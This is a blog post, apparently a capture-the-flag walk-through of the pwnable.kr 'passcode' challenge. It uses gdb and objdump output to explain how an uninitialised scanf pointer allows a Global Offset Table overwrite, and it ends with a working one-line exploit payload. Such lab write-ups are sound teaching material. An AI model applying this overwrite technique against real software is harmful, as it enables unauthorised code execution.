---
layout: post
title: Pwnable.kr Passcode Walk-through
---

## Pwnable.kr Passcode Walk-though
Here is a walk-through of the passcode challenge on [Pwnable.kr](http://pwnable.kr/play.php).

After logging into the remote server, we can look at the C source. The authentication check seems pretty simple:

    if (passcode1 == 338150 && passcode2 == 13371337) {
        printf("Login OK!\n");
        system("/bin/cat flag");
    }

Therefore if we can put the correct magic numbers into the two passcode integers the flag will be printed. It can't be 
that simple, can it? Let's run the program and see:

    > ./passcode
    enter you name : matthew
    Welcome matthew!
    enter passcode1 : 338150
    Segmentation fault

Clearly not. The program crashes even with reasonable inputs...

There is a clue in the challenge description that the C program produces compiler warnings. Let's try compiling and
see if that provides any insights. Running:

    gcc passcode.c

fails to create an output file due to permissions, but does provide the following warnings:

    passcode.c: In function ‘login’:
    passcode.c:9:8: warning: format ‘%d’ expects argument of type ‘int *’, but argument 2 has type ‘int’ [-Wformat=]
      scanf("%d", passcode1);
            ^
    passcode.c:14:15: warning: format ‘%d’ expects argument of type ‘int *’, but argument 2 has type ‘int’ [-Wformat=]
             scanf("%d", passcode2);
                   ^

Well, here's the cause of the segmentation fault. The passcodes are being written to arbitrary memory addresses.
This suggests that if we could somehow control these memory addresses we could populate them with data of our choice.

Taking another look at the code we can see that the name input is 100 bytes long. It can't be overflowed, however, due
to the `scanf` format string. Nor is there a format string vulnerability in the subsequent `printf`:

    char name[100];     
    printf("enter you name : ");
    scanf("%100s", name);
    printf("Welcome %s!\n", name);

OK then. Let's just fill the buffer with 100 'A's and use `gdb` to see what happens:

    > python -c "from __future__ import print_function ; print('A'*100, end='')" > /tmp/pcex123
    gdb -q passcode
    (gdb) set disassembly intel
    (gdb) b login
    (gdb) run < /tmp/pcex123
    (gdb) layout asm

The passcode addresses can be seen looking at the disassembly of the `login` function:

    0x8048577 <login+19>    mov    eax,0x8048783
    0x804857c <login+24>    mov    edx,DWORD PTR [ebp-0x10]
    0x804857f <login+27>    mov    DWORD PTR [esp+0x4],edx
    0x8048583 <login+31>    mov    DWORD PTR [esp],eax
    0x8048586 <login+34>    call   0x80484a0 <__isoc99_scanf@plt>

and:

    0x80485a5 <login+65>    mov    eax,0x8048783
    0x80485aa <login+70>    mov    edx,DWORD PTR [ebp-0xc]
    0x80485ad <login+73>    mov    DWORD PTR [esp+0x4],edx
    0x80485b1 <login+77>    mov    DWORD PTR [esp],eax
    0x80485b4 <login+80>    call   0x80484a0 <__isoc99_scanf@plt>

The only difference between these two blocks of code is the value placed onto the stack from `edx`. For `passcode1` 
it's the content of `ebp-0x10` and for `passcode2` it's the content of `ebp-0xc`. The fact that these two stack addresses
are only 4 bytes apart (the size of an `int`) corroborates that these are the passcodes.

Looking at the content of these addresses:

    (gdb) x/x $ebp-0x10
    0xff8e84d8:     0x41414141
    (gdb) x/x $ebp-0xc
    0xff8e84dc:     0xad1ce200

we can see that `passcode1` has been written into with 'A's (0x41 is the ASCII hex value of 'A'), but `passcode2` has not.

So, we can manipulate the value of `passcode1` but not `passcode2`. That suggests that we need to somehow bypass the
expression in the `if` statement which checks the passcodes. We can't patch the binary, though, since we don't have
permission and the text (code) segment is read-only. What we need is a way to modify data that controls the execution flow.

The Global Offset Table (GOT) holds memory addresses of functions in shared libraries which a process links to
at runtime. Since the memory addresses of the shared functions are not known when the process is compiled, the GOT is
updated during process start-up. This means it is writable by the process and a useful control point for us.

Helpfully (!) there is a library call to `fflush` right after the `scanf` for `passcode1`:

    scanf("%d", passcode1);
    fflush(stdin);

By running:

    objdump -R passcode

we can see that the address of the entry for `fflush` is 0x0804a004:

    passcode:     file format elf32-i386

    DYNAMIC RELOCATION RECORDS
    OFFSET   TYPE              VALUE 
    08049ff0 R_386_GLOB_DAT    __gmon_start__
    0804a02c R_386_COPY        stdin@@GLIBC_2.0
    0804a000 R_386_JUMP_SLOT   printf@GLIBC_2.0
    0804a004 R_386_JUMP_SLOT   fflush@GLIBC_2.0 <----------------
    0804a008 R_386_JUMP_SLOT   __stack_chk_fail@GLIBC_2.4
    0804a00c R_386_JUMP_SLOT   puts@GLIBC_2.0
    0804a010 R_386_JUMP_SLOT   system@GLIBC_2.0
    0804a014 R_386_JUMP_SLOT   __gmon_start__
    0804a018 R_386_JUMP_SLOT   exit@GLIBC_2.0
    0804a01c R_386_JUMP_SLOT   __libc_start_main@GLIBC_2.0
    0804a020 R_386_JUMP_SLOT   __isoc99_scanf@GLIBC_2.7

And looking at the disassembly of the `login` function with:

    objdump -d -Mintel passcode

    ...
    80485e3:       c7 04 24 af 87 04 08    mov    DWORD PTR [esp],0x80487af
    80485ea:       e8 71 fe ff ff          call   8048460 <system@plt>
    ...

we can see that the address we want to write (to jump over the `if` check) is 0x080485e3, which is 134514147 in decimal.

Armed with those two addresses and taking into account that x86 is little-endian, let's try out our exploit:

    python -c "from __future__ import print_function ; print('A'*96 + '\x04\xa0\x04\x08' + '134514147', end='')" | ./passcode

And we capture the flag!
